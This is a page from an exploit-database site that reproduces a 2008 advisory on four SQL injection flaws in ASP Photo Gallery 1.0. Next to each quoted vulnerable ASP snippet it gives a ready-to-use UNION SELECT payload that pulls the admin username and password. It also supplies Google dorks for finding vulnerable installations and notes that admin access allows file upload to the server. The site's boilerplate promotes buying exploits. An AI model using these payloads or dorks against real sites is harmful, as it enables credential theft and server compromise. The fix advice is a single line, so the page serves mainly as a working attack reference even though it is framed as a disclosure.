0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities
============================================================ ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities ============================================================ ###################################################################### # # ASP Photo Gallery 1.0 - Multiple SQL Injection Vulnerabilities # # Date : 12-january-2008 # Risk : Medium # Vendor URL : http://www.matteobinda.com/apg.php # Google Dork : "download this free gallery at matteobinda.com" # : allinurl: imgbig.asp?id= # # Found By : Ruben Ventura Pina (Trew) # ###################################################################### # # Greetings oh earthlings: # Ayzax, BRIO, Gaper (All ICEnetX Team) # and to all people who likes H.I.M, lol. # # "Maybe you can't break the system, but you can always hack it." # ###################################################################### # ## Vulnerability ## # # "ASP Photo Gallery" is a free tool to create web galleries. It was # written in ASP and uses an Access Database to store data. # Input is not propperly santised, therefore the application has # multiple SQL injection vulnerabilities. # # --- # First bug: # The following code in the Imgbig.asp file is vulnerable: # <% ... # nomefoto = request("Id") # ... # sql = "SELECT * FROM fotoinfo WHERE name='" & nomefoto & "'" # objrs.Open sql, objConn ,3,3 # ... %> # # Input passed to the "Id" parameter is not santised. This can be # exploited in the following manner to obtain the admin's password: # # http://[site]/Imgbig.asp?Id='union select user as name,1,pass as descrizione from stuff where '1'='1 # # --- # Second bug: # The following code in the thumbricerca.asp file is vulnerable: # <% ... # ricerca = Request.QueryString("id") # ... # sql = "SELECT * from fotoinfo where descrizione like '%" & ricerca & "%' order by name desc" # objrs.Open sql, objConn ,3,3 # ... %> # # Input passed to the "id" parameter is not santised. This can be # exploited in the following manner to obtain the admin's password: # # /thumbricerca.asp?id=-1'union select user as name,1,pass as descrizione from stuff where 1 like '% # # --- # Third bug: # The following code in the thumbricerca.asp file is vulnerable: # <% ... # ricerca = request.form("ricerca") # ... # sql = "SELECT * from fotoinfo where descrizione like '%" & ricerca & "%' order by name desc" # objrs.Open sql, objConn ,3,3 # ... %> # # Input passed to the "ricerca" parameter is not santised. This can be # exploited by inserting the following code into the search textfield # located in the thumbricerca.asp file: # -1'union select user as name,1,pass as descrizione from stuff where 1 like '% # -- # Fourth bug: # The following code in the thumb.asp file is vulnerable: # <% ... # intCodice = request("id") # ... # sql = "SELECT * from fotoinfo where category ='" & intcodice & "' order by name desc" # objrs.Open sql, objConn ,3,3 # ..%> # # Input passed to the "id" parameter is not santised. This can be exploited # in the following manner to obtain the admin's password: # # /thumb.asp?id=' union select user as name,1,pass as descrizione from stuff where '1'='1 # # # After an attacker has logged in into the admin panel (/admin/admin.asp), he'll have the # possibility to upload files to the server. # # ## How to fix ## # # Santise all input which is then used in SQL queries. # # 0day.today [2024-12-25] #